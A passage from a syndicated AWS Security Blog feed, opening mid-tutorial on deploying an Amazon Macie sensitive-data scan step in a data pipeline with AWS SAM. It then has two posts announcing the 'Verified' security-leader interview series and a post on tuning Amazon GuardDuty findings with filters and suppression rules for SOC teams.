  16. moveToScannedDataS3Files Lambda function moves the objects from the manual review S3 bucket to the scanned data S3 bucket.
  17. The next step of the automated data pipeline will begin with the objects in the scanned data S3 bucket.

Prerequisites

For this application, you need the following prerequisites:

You can use AWS Cloud9 to deploy the application. AWS Cloud9 includes the AWS CLI and AWS SAM CLI to simplify setting up your development environment.

Deploy the application with AWS SAM CLI

You can deploy this application using the AWS SAM CLI. AWS SAM uses AWS CloudFormation as the underlying deployment mechanism. AWS SAM is an open-source framework that you can use to build serverless applications on AWS.

To deploy the application

  1. Initialize the serverless application using the AWS SAM CLI from the GitHub project in the aws-samples repository. This will clone the project locally which includes the source code for the Lambda functions, Step Functions state machine definition file, and the AWS SAM template. On the command line, run the following:
    sam init --location gh: aws-samples/amazonmacie-datapipeline-scan
    

    Alternatively, you can clone the Github project directly.

  2. Deploy your application to your AWS account. On the command line, run the following:
    sam deploy --guided
    

    Complete the prompts during the guided interactive deployment. The first deployment prompt is shown in the following example.

    Configuring SAM deploy
    ======================
    
            Looking for config file [samconfig.toml] :  Found
            Reading default arguments  :  Success
    
            Setting default arguments for 'sam deploy'
            =========================================
            Stack Name [maciepipelinescan]:
    

  3. Settings:
    • Stack Name – Name of the CloudFormation stack to be created.
    • AWS RegionRegion—for example, us-west-2, eu-west-1, ap-southeast-1—to deploy the application to. This application was tested in the us-west-2 and ap-southeast-1 Regions. Before selecting a Region, verify that the services you need are available in those Regions (for example, Macie and Step Functions).
    • Parameter StepFunctionName – Name of the Step Functions state machine to be created—for example, maciepipelinescanstatemachine).
    • Parameter BucketNamePrefix – Prefix to apply to the S3 buckets to be created (S3 bucket names are globally unique, so choosing a random prefix helps ensure uniqueness).
    • Parameter ApprovalEmailDestination – Email address to receive the manual review notification.
    • Parameter EnableMacie – Whether you need Macie enabled in your account or Region. You can select yes or no; select yes if you need Macie to be enabled for you as part of this template, select no, if you already have Macie enabled.
  4. Confirm changes and provide approval for AWS SAM CLI to deploy the resources to your AWS account by responding y to prompts, as shown in the following example. You can accept the defaults for the SAM configuration file and SAM configuration environment prompts.
    #Shows you resources changes to be deployed and require a 'Y' to initiate deploy
    Confirm changes before deploy [y/N]: y
    #SAM needs permission to be able to create roles to connect to the resources in your template
    Allow SAM CLI IAM role creation [Y/n]: y
    ReceiveApprovalDecisionAPI may not have authorization defined, Is this okay? [y/N]: y
    ReceiveApprovalDecisionAPI may not have authorization defined, Is this okay? [y/N]: y
    Save arguments to configuration file [Y/n]: y
    SAM configuration file [samconfig.toml]: 
    SAM configuration environment [default]:
    

    Note: This application deploys an Amazon API Gateway with two REST API resources without authorization defined to receive the decision from the manual review step. You will be prompted to accept each resource without authorization. A token (Step Functions taskToken) is used to authenticate the requests.

  5. This creates an AWS CloudFormation changeset. Once the changeset creation is complete, you must provide a final confirmation of y to Deploy the changeset? [y/N] when prompted as shown in the following example.
    Changeset created successfully. arn:aws:cloudformation:ap-southeast-1:XXXXXXXXXXXX:changeSet/samcli-deploy1605213119/db681961-3635-4305-b1c7-dcc754c7XXXX
    
    
    Previewing CloudFormation changeset before deployment
    ======================================================
    Deploy this changeset? [y/N]:
    

Your application is deployed to your account using AWS CloudFormation. You can track the deployment events in the command prompt or via the AWS CloudFormation console.

After the application deployment is complete, you must confirm the subscription to the Amazon SNS topic. An email will be sent to the email address entered in Step 3 with a link that you need to select to confirm the subscription. This confirmation provides opt-in consent for AWS to send emails to you via the specified Amazon SNS topic. The emails will be notifications of potentially sensitive data that need to be approved. If you don’t see the verification email, be sure to check your spam folder.

Test the application

The application uses an EventBridge scheduled rule to start the sensitive data scan workflow, which runs every 6 hours. You can manually start an execution of the workflow to verify that it’s working. To test the function, you will need a file that contains data that matches your rules for sensitive data. For example, it is easy to create a spreadsheet, document, or text file that contains names, addresses, and numbers formatted like credit card numbers. You can also use this generated sample data to test Macie.

We will test by uploading a file to our S3 bucket via the AWS web console. If you know how to copy objects from the command line, that also works.

Upload test objects to the S3 bucket

  1. Navigate to the Amazon S3 console and upload one or more test objects to the <BucketNamePrefix>-data-pipeline-raw bucket. <BucketNamePrefix> is the prefix you entered when deploying the application in the AWS SAM CLI prompts. You can use any objects as long as they’re a supported file type for Amazon Macie. I suggest uploading multiple objects, some with and some without sensitive data, in order to see how the workflow processes each.

Start the Scan State Machine

  1. Navigate to the Step Functions state machines console. If you don’t see your state machine, make sure you’re connected to the same region that you deployed your application to.
  2. Choose the state machine you created using the AWS SAM CLI as seen in Figure 3. The example state machine is maciepipelinescanstatemachine, but you might have used a different name in your deployment.
     
    Figure 3: AWS Step Functions state machines console

    Figure 3: AWS Step Functions state machines console

  3. Select the Start execution button and copy the value from the Enter an execution name – optional box. Change the Input – optional value replacing <execution id> with the value just copied as follows:
    {
        “id”: “<execution id>”
    }
    

    In my example, the <execution id> is fa985a4f-866b-b58b-d91b-8a47d068aa0c from the Enter an execution name – optional box as shown in Figure 4. You can choose a different ID value if you prefer. This ID is used by the workflow to tag the objects being processed to ensure that only objects that are scanned continue through the pipeline. When the EventBridge scheduled event starts the workflow as scheduled, an ID is included in the input to the Step Functions workflow. Then select Start execution again.
     

    Figure 4: New execution dialog box

    Figure 4: New execution dialog box

  4. You can see the status of your workflow execution in the Graph inspector as shown in Figure 5. In the figure, the workflow is at the pollForCompletionWait step.
     
    Figure 5: AWS Step Functions graph inspector

    Figure 5: AWS Step Functions graph inspector

The sensitive discovery job should run for about five to ten minutes. The jobs scale linearly based on object size, but there is a start-up time per job that is constant. If sensitive data is found in the objects uploaded to the <BucketNamePrefix>-data-pipeline-upload S3 bucket, an email is sent to the address provided during the AWS SAM deployment step, notifying the recipient requesting of the need for an approval decision, which they indicate by selecting the link corresponding to their decision to approve or deny the next step as shown in Figure 6.
 

Figure 6: Sensitive data identified email

Figure 6: Sensitive data identified email

When you receive this notification, you can investigate the findings by reviewing the objects in the <BucketNamePrefix>-data-pipeline-manual-review S3 bucket. Based on your review, you can either apply remediation steps to remove any sensitive data or allow the data to proceed to the next step of the data ingestion pipeline. You should define a standard response process to address discovery of sensitive data in the data pipeline. Common remediation steps include review of the files for sensitive data, deleting the files that you do not want to progress, and updating the ETL process to redact or tokenize sensitive data when re-ingesting into the pipeline. When you re-ingest the files into the pipeline without sensitive data, the files will not be flagged by Macie.

The workflow performs the following:

  • If you select Approve, the files are moved to the <BucketNamePrefix>-data-pipeline-scanned-data S3 bucket with an Amazon S3 SensitiveDataFound object tag with a value of true.
  • If you select Deny, the files are deleted from the <BucketNamePrefix>-data-pipeline-manual-review S3 bucket.
  • If no action is taken, the Step Functions workflow execution times out after five days and the file will automatically be deleted from the <BucketNamePrefix>-data-pipeline-manual-review S3 bucket after 10 days.

Clean up the application

You’ve successfully deployed and tested the sensitive data pipeline scan workflow. To avoid ongoing charges for resources you created, you should delete all associated resources by deleting the CloudFormation stack. In order to delete the CloudFormation stack, you must first delete all objects that are stored in the S3 buckets that you created for the application.

To delete the application

  1. Empty the S3 buckets created in this application (<BucketNamePrefix>-data-pipeline-raw S3 bucket, <BucketNamePrefix>-data-pipeline-scan-stage, <BucketNamePrefix>-data-pipeline-manual-review, and <BucketNamePrefix>-data-pipeline-scanned-data).
  2. Delete the CloudFormation stack used to deploy the application.

Considerations for regular use

Before using this application in a production data pipeline, you will need to stop and consider some practical matters. First, the notification mechanism used when sensitive data is identified in the objects is email. Email doesn’t scale: you should expand this solution to integrate with your ticketing or workflow management system. If you choose to use email, subscribe a mailing list so that the work of reviewing and responding to alerts is shared across a team.

Second, the application is run on a scheduled basis (every 6 hours by default). You should consider starting the application when your preliminary validations have completed and are ready to perform a sensitive data scan on the data as part of your pipeline. You can modify the EventBridge Event Rule to run in response to an Amazon EventBridge event instead of a scheduled basis.

Third, the application currently uses a 60 second Step Functions Wait state when polling for the Macie discovery job completion. In real world scenarios, the discovery scan will take 10 minutes at a minimum, likely several orders of magnitude longer. You should evaluate the typical execution times for your application execution and tune the polling period accordingly. This will help reduce costs related to running Lambda functions and log storage within CloudWatch Logs. The polling period is defined in the Step Functions state machine definition file (macie_pipeline_scan.asl.json) under the pollForCompletionWait state.

Fourth, the application currently doesn’t account for false positives in the sensitive data discovery job results. Also, the application will progress or delete all objects identified based on the decision by the reviewer. You should consider expanding the application to handle false positives through automation rather than manual review / intervention (such as deleting the files from the manual review bucket or removing the sensitive data tags applied).

Last, the solution will stop the ingestion of a subset of objects into your pipeline. This behavior is similar to other validation and data quality checks that most customers perform as part of the data pipeline. However, you should test to ensure that this will not cause unexpected outcomes and address them in your downstream application logic accordingly.

Conclusion

In this post, I showed you how to integrate sensitive data discovery using Macie as an additional validation step in an automated data pipeline. You’ve reviewed the components of the application, deployed it using the AWS SAM CLI, tested to validate that the application functions as expected, and cleaned up by removing deployed resources.

You now know how to integrate sensitive data scanning into your ETL pipeline. You can use automation and—where required—manual review to help reduce the risk of sensitive data, such as personally identifiable information, being inadvertently ingested into a data lake. You can take this application and customize it to fit your use case and workflows, such as using custom data identifiers as part of your scans, adding additional validation steps, creating Macie suppression rules to define cases to archive findings automatically, or only request manual approvals for findings that meet certain criteria (such as high severity findings).

If you have feedback about this post, submit comments in the Comments section below. If you have questions about this post, start a new thread on the Amazon Macie forum.

Want more AWS Security how-to content, news, and feature announcements? Follow us on Twitter.

Author

Brandon Wu

Brandon is a security solutions architect helping financial services organizations secure their critical workloads on AWS. In his spare time, he enjoys exploring outdoors and experimenting in the kitchen.

Verified, episode 2 – A Conversation with Emma Smith, Director of Global Cyber Security at Vodafone

Post Syndicated from Stephen Schmidt original https://aws.amazon.com/blogs/security/verified-episode-2-conversation-with-emma-smith-director-of-global-cyber-security-at-vodafone/

Over the past 8 months, it’s become more important for us all to stay in contact with peers around the globe. Today, I’m proud to bring you the second episode of our new video series, Verified: Presented by AWS re:Inforce. Even though we couldn’t be together this year at re:Inforce, our annual security conference, we still wanted to share some of the conversations with security leaders that would have taken place at the conference. The series showcases conversations with security leaders around the globe. In episode two, I’m talking to Emma Smith, Vodafone’s Global Cyber Security Director.

Vodafone is a global technology communications company with an optimistic culture. Their focus is connecting people and building the digital future for society. During our conversation, Emma detailed how the core values of the Global Cyber Security team were inspired by the company. “We’ve got a team of people who are ultimately passionate about protecting customers, protecting society, protecting Vodafone, protecting all of our services and our employees.” Emma shared experiences about the evolution of the security organization during her past 5 years with the company.

We were also able to touch on one of Emma’s passions, diversity and inclusion. Emma has worked to implement diversity and drive a policy of inclusion at Vodafone. In June, she was named Diversity Champion in the SC Awards Europe. In her own words: “It makes me realize that my job is to smooth the way for everybody else and to try and remove some of those obstacles or barriers that were put in their way… it means that I’m really passionate about trying to get a very diverse team in security, but also in Vodafone, so that we reflect our customer base, so that we’ve got diversity of thinking, of backgrounds, of experience, and people who genuinely feel comfortable being themselves at work—which is easy to say but really hard to create that culture of safety and belonging.”

Stay tuned for future episodes of Verified: Presented by AWS re:Inforce here on the AWS Security Blog. You can watch episode one, an interview with Jason Chan, Vice President of Information Security at Netflix on YouTube. If you have an idea or a topic you’d like covered in this series, please drop us a comment below.

Want more AWS Security how-to content, news, and feature announcements? Follow us on Twitter.

Author

Steve Schmidt

Steve is Vice President and Chief Information Security Officer for AWS. His duties include leading product design, management, and engineering development efforts focused on bringing the competitive, economic, and security benefits of cloud computing to business and government customers. Prior to AWS, he had an extensive career at the Federal Bureau of Investigation, where he served as a senior executive and section chief. He currently holds 11 patents in the field of cloud security architecture. Follow Steve on Twitter.

Introducing the first video in our new series, Verified, featuring Netflix’s Jason Chan

Post Syndicated from Stephen Schmidt original https://aws.amazon.com/blogs/security/introducing-first-video-new-series-verified-featuring-netflix-jason-chan/

The year has been a profoundly different one for us all, and like many of you, I’ve been adjusting, both professionally and personally, to this “new normal.” Here at AWS we’ve seen an increase in customers looking for secure solutions to maintain productivity in an increased work-from-home world. We’ve also seen an uptick in requests for training; it’s clear, a sense of community and learning are critically important as workforces physically distance.

For these reasons, I’m happy to announce the launch of Verified: Presented by AWS re:Inforce. I’m hosting this series, but I’ll be joined by leaders in cloud security across a variety of industries. The goal is to have an open conversation about the common issues we face in securing our systems and tools. Topics will include how the pandemic is impacting cloud security, tips for creating an effective security program from the ground up, how to create a culture of security, emerging security trends, and more. Learn more by following me on Twitter (@StephenSchmidt), and get regular updates from @AWSSecurityInfo. Verified is just one of the many ways we will continue sharing best practices with our customers during this time. You can find more by reading the AWS Security Blog, reviewing our documentation, visiting the AWS Security and Compliance webpages, watching re:Invent and re:Inforce playlists, and/or reviewing the Security Pillar of Well Architected.

Our first conversation, above, is with Jason Chan, Vice President of Information Security at Netflix. Jason spoke to us about the security program at Netflix, his approach to hiring security talent, and how Zero Trust enables a remote workforce. Jason also has solid insights to share about how he started and grew the security program at Netflix.

“In the early days, what we were really trying to figure out is how do we build a large-scale consumer video-streaming service in the public cloud, and how do you do that in a secure way? There wasn’t a ton of expertise in that, so when I was building the security team at Netflix, I thought, ‘how do we bring in folks from a variety of backgrounds, generalists … to tackle this problem?’”

He also gave his view on how a growing security team can measure ROI. “I think it’s difficult to have a pure equation around that. So what we try to spend our time doing is really making sure that we, as a team, are aligned on what is the most important—what are the most important assets to protect, what are the most critical risks that we’re trying to prevent—and then make sure that leadership is aligned with that, because, as we all know, there’s not unlimited resources, right? You can’t hire an unlimited number of folks or spend an unlimited amount of money, so you’re always trying to figure out how do you prioritize, and how do you find where is going to be the biggest impact for your value?”

Check out Jason’s full interview above, and stay tuned for further videos in this series. If you have an idea or a topic you’d like covered in this series, please drop us a comment below. Thanks!

Want more AWS Security how-to content, news, and feature announcements? Follow us on Twitter.

Author

Steve Schmidt

Steve is Vice President and Chief Information Security Officer for AWS. His duties include leading product design, management, and engineering development efforts focused on bringing the competitive, economic, and security benefits of cloud computing to business and government customers. Prior to AWS, he had an extensive career at the Federal Bureau of Investigation, where he served as a senior executive and section chief. He currently holds 11 patents in the field of cloud security architecture. Follow Steve on Twitter.

How Security Operation Centers can use Amazon GuardDuty to detect malicious behavior

Post Syndicated from Darren House original https://aws.amazon.com/blogs/security/how-security-operation-centers-can-use-amazon-guardduty-to-detect-malicious-behavior/

The Security Operations Center (SOC) has a tough job. As customers modernize and shift to cloud architectures, the ability to monitor, detect, and respond to risks poses different challenges.

In this post we address how Amazon GuardDuty can address some common concerns of the SOC regarding the number of security tools and the overhead to integrate and manage them. We describe the GuardDuty service, how the SOC can use GuardDuty threat lists, filtering, and suppression rules to tune detections and reduce noise, and the intentional model used to define and categorize GuardDuty finding types to quickly give detailed information about detections.

Today, the typical SOC has between 10 and 60 tools for managing security. Some larger SOCs can have more than 100 tools, which are mostly point solutions that don’t integrate with each other.

The security market is flush with niche security tools you can deploy to monitor, detect, and respond to events. Each tool has technical and operational overhead in the form of designing system uptime, sensor deployment, data aggregation, tool integration, deployment plans, server and software maintenance, and licensing.

Tuning your detection systems is an example of a process with both technical and operational overhead. To improve your signal-to-noise ratio (S/N), the security systems you deploy have to be tuned to your environment and to emerging risks that are relevant to your environment. Improving the S/N matters for SOC teams because it reduces time and effort spent on activities that don’t bring value to an organization. Spending time tuning detection systems reduces the exhaustion factors that impact your SOC analysts. Tuning is highly technical, yet it’s also operational because it’s a process that continues to evolve, which means you need to manage the operations and maintenance lifecycle of the infrastructure and tools that you use in tuning your detections.

Amazon GuardDuty

GuardDuty is a core part of the modern FedRAMP-authorized cloud SOC, because it provides SOC analysts with a broad range of cloud-specific detective capabilities without requiring the overhead associated with a large number of security tools.

GuardDuty is a continuous security monitoring service that analyzes and processes data from Amazon Virtual Private Cloud (VPC) Flow Logs, AWS CloudTrail event logs that record Amazon Web Services (AWS) API calls, and DNS logs to provide analysis and detection using threat intelligence feeds, signatures, anomaly detection, and machine learning in the AWS Cloud. GuardDuty also helps you to protect your data stored in S3. GuardDuty continuously monitors and profiles S3 data access events (usually referred to as data plane operations) and S3 configurations (control plane APIs) to detect suspicious activities. Detections include unusual geo-location, disabling of preventative controls such as S3 block public access, or API call patterns consistent with an attempt to discover misconfigured bucket permissions. For a full list of GuardDuty S3 threat detections, see GuardDuty S3 finding types. GuardDuty integrates threat intelligence feeds from CrowdStrike, Proofpoint, and AWS Security to detect network and API activity from known malicious IP addresses and domains. It uses machine learning to identify unknown and potentially unauthorized and malicious activity within your AWS environment.

The GuardDuty team continually monitors and manages the tuning of detections for threats related to modern cloud deployments, but your SOC can use trusted IP and threat lists and suppression rules to implement your own custom tuning to fit your unique environment.

GuardDuty is integrated with AWS Organizations, and customers can use AWS Organizations to associate member accounts with a GuardDuty management account. AWS Organizations helps automate the process of enabling and disabling GuardDuty simultaneously across a group of AWS accounts that are in your control. Note that, as of this writing, you can have one management account and up to 5,000 member accounts.

Operational overhead is near zero. There are no agents or sensors to deploy or manage. There are no servers to build, deploy, or manage. There’s nothing to patch or upgrade. There aren’t any highly available architectures to build. You don’t have to buy a subscription to a threat intelligence provider, manage the influx of threat data and most importantly, you don’t have to invest in normalizing all of the datasets to facilitate correlation. Your SOC can enable GuardDuty with a single click or API call. It is a multi-account service where you can create a management account, typically in the security account, that can read all findings information from the member accounts for easy centralization of detections. When deployed in a Management/Member design, GuardDuty provides a flexible model for centralizing your enterprise threat detection capability. The management account can control certain member settings, like update intervals for Amazon CloudWatch Events, use of threat and trusted lists, creation of suppression rules, opening tickets, and automating remediations.

Filters and suppression rules

When GuardDuty detects potential malicious activity, it uses a standardized finding format to communicate the details about the specific finding. The details in a finding can be queried in filters, displayed as saved rules, or used for suppression to improve visibility and reduce analyst fatigue.

Suppress findings from vulnerability scanners

A common example of tuning your GuardDuty deployment is to use suppression rules to automatically archive new Recon:EC2/Portscan findings from vulnerability assessment tools in your accounts. This is a best practice designed to reduce S/N and analyst fatigue.

The first criteria in the suppression rule should use the Finding type attribute with a value of Recon:EC2/Portscan. The second filter criteria should match the instance or instances that host these vulnerability assessment tools. You can use the Instance image ID attribute, the Network connection remote IPv4 address, or the Tag value attribute depending on what criteria is identifiable with the instances that host these tools. In the example shown in Figure 1, we used the remote IPv4 address.

Figure 1: GuardDuty filter for vulnerability scanners

Figure 1: GuardDuty filter for vulnerability scanners

Filter on activity that was not blocked by security groups or NACL

If you want visibility into the GuardDuty detections that weren’t blocked by preventative measures such as a network ACL (NACL) or security group, you can filter by the attribute Network connection blocked = False, as shown in Figure 2. This can provide visibility into potential changes in your filtering strategy to reduce your risk.

Figure 2: GuardDuty filter for activity not blocked by security groups on NACLs

Figure 2: GuardDuty filter for activity not blocked by security groups on NACLs

Filter on specific malicious IP addresses

Some customers want to track specific malicious IP addresses to see whether they are generating findings. If you want to see whether a single source IP address is responsible for CloudTrail-based findings, you can filter by the API caller IPv4 address attribute.

Figure 3: GuardDuty filter for specific malicious IP address

Figure 3: GuardDuty filter for specific malicious IP address

Filter on specific threat provider

Maybe you want to know how many findings are generated from a threat intelligence provider or your own threat lists. You can filter by the attribute Threat list name to see if the potential attacker is on a threat list from CrowdStrike, Proofpoint, AWS, or your threat lists that you uploaded to GuardDuty.

Figure 4: GuardDuty filter for specific threat intelligence list provider

Figure 4: GuardDuty filter for specific threat intelligence list provider

Finding types and formats

Now that you know a little more about GuardDuty and tuning findings by using filters and suppression rules, let’s dive into the finding types that are generated by a GuardDuty detection. The first thing to know is that all GuardDuty findings use the following model:


ThreatPurpose:ResourceTypeAffected/ThreatFamilyName.ThreatFamilyVariant!Artifact

This model is intended to communicate core information to security teams on the nature of the potential risk, the AWS resource types that are potentially impacted, and the threat family name, variants, and artifacts of the detected activity in your account. The Threat Purpose field describes the primary purpose of a threat or a potential attempt on your environment.

Let’s take the Backdoor:EC2/C&CActivity.B!DNS finding as an example.


ThreatPurpose:ResourceTypeAffected/ThreatFamilyName.ThreatFamilyVariant!Artifact
Backdoor     :EC2                 /C&CActivity.    .B                  !DNS

The Backdoor threat purpose indicates an attempt to bypass normal security controls on a specific Amazon Elastic Compute Cloud (EC2) instance. In this example, the EC2 instance in your AWS environment is querying a domain name (DNS) associated with a known command and control (C&CActivity) server. This is a high-severity finding, because there are enough indicators that malware is on your host and acting with malicious intent.

GuardDuty, at the time of this writing, supports the following finding types:

  • Backdoor finding types
  • Behavior finding types
  • CryptoCurrency finding types
  • PenTest finding types
  • Persistence finding types
  • Policy finding types
  • PrivilegeEscalation finding types
  • Recon finding types
  • ResourceConsumption finding types
  • Stealth finding types
  • Trojan finding types
  • Unauthorized finding types

OK, now you know about the model for GuardDuty findings, but how does GuardDuty work?

When you enable GuardDuty, the service evaluates events in both a stateless and stateful manner, which allows us to use machine learning and anomaly detection in addition to signatures and threat intelligence. Some stateless examples include the Backdoor:EC2/C&CActivity.B!DNS or the CryptoCurrency:EC2/BitcoinTool.B finding types, where GuardDuty only needs to see a single DNS query, VPC Flow Log entry, or CloudTrail record to detect potentially malicious activity.

Stateful detections are driven by anomaly detection and machine learning models that identify behaviors that deviate from a baseline. The machine learning detections typically require more time to train the models and potentially use multiple events for triggering the detection.

The typical triggers for behavioral detections vary based on the log source and the detection in question. The behavioral detections learn about typical network or user activity to set a baseline, after which the anomaly detections change from a learning mode to an active mode. In active mode, you only see findings generated from these detections if the service observes behavior that suggests a deviation. Some examples of machine learning–based detections include the Backdoor:EC2/DenialOfService.Dns, UnauthorizedAccess:IAMUser/ConsoleLogin, and Behavior:EC2/NetworkPortUnusual finding types.

Why does this matter?

We know the SOC has the tough job of keeping organizations secure with limited resources, and with a high degree of technical and operational overhead due to a large portfolio of tools. This can impact the ability to detect and respond to security events. For example, CrowdStrike tracks the concept of breakout time—the window of time from when an outside party first gains unauthorized access to an endpoint machine, to when they begin moving laterally across your network. They identified average breakout times are between 19 minutes and 10 hours. If the SOC is overburdened with undifferentiated technical and operational overhead, it can struggle to improve monitoring, detection, and response. To act quickly, we have to decrease detection time and the overhead burden on the SOC caused by the numerous tools used. The best way to decrease detection time is with threat intelligence and machine learning. Threat intelligence can provide context to alerts and gives a broader perspective of cyber risk. Machine learning uses baselines to detect what normal looks like, enabling detection of anomalies in user or resource behavior, and heuristic threats that change over time. The best way to reduce SOC overhead is to share the load so that AWS services manage the undifferentiated heavy lifting, while the SOC focuses on more specific tasks that add value to the organization.

GuardDuty is a cost-optimized service that is in scope for the FedRAMP and DoD compliance programs in the US commercial and GovCloud Regions. It leverages threat intelligence and machine learning to provide detection capabilities without you having to manage, maintain, or patch any infrastructure or manage yet another security tool. With a 30-day trial period, there is no risk to evaluate the service and discover how it can support your cyber risk strategy.

If you want to receive automated updates about GuardDuty, you can subscribe to an SNS notification that will email you whenever new features and detections are released.

If you have feedback about this post, submit comments in the Comments section below. If you have questions about this post, start a new thread on the Amazon GuardDuty forum or contact AWS Support.

Want more AWS Security how-to content, news, and feature announcements? Follow us on Twitter.

Author

Darren House

Darren brings over 20 years’ experience building secure technology architectures and technical strategies to support customer outcomes. He has held several roles including CTO, Director of Technology Solutions, Technologist, Principal Solutions Architect, and Senior Network Engineer for USMC. Today, he is focused on enabling AWS customers to adopt security services and automations that increase visibility and reduce risk.

Author

Trish Cagliostro

Trish is a leader in the security industry where she has spent 10 years advising public and private sector customers like DISA, DHS, and US Senate and commercial entities like Bank of America and United Airlines. Trish is a subject matter expert on a variety of topics, including integrating threat intelligence and has testified before the House Homeland Security Committee about information sharing.